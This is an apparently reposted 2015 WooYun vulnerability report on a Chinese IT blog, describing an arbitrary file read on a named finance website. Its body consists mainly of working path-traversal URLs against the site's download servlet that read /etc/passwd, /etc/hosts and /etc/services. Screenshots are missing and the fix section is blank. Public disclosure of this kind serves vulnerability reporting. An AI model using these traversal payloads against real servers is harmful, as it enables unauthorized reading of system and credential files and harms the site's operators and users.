IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
  • 登录 注册

    财客在线某处任意文件读取漏洞

    Chloe O_o发表于 2015-09-12 15:20:24
    love 0
    漏洞标题 财客在线某处任意文件读取漏洞
    相关厂商 财客在线
    漏洞作者 路人甲
    提交时间 2015-07-29 22:07
    公开时间 2015-09-12 22:08
    漏洞类型 命令执行
    危害等级 高
    自评Rank 20
    漏洞状态 未联系到厂商或者厂商积极忽略
    Tags标签 补丁不及时,远程命令执行

    漏洞详情

    通过下载用户的一个XLS表格

    获得下载地址:

    http://zx.caakee.com/servlet/download?fileName=caakee_importAccount.xls

    在filename参数写入../../../../../../../../../../etc/passwd

    即可弹出下载

    235.png

    打开后

    3468.png

    zx.caakee.com/servlet/download?fileName=../../../../../../../../../../etc/hosts

    25.png

    2357.png

    漏洞证明:

    zx.caakee.com/servlet/download?fileName=../../../../../../../../../../etc/hosts

    zx.caakee.com/servlet/download?fileName=../../../../../../../../../../etc/services

    修复方案:

    版权声明:转载请注明来源 路人甲@乌云



沪ICP备19023445号-2号
友情链接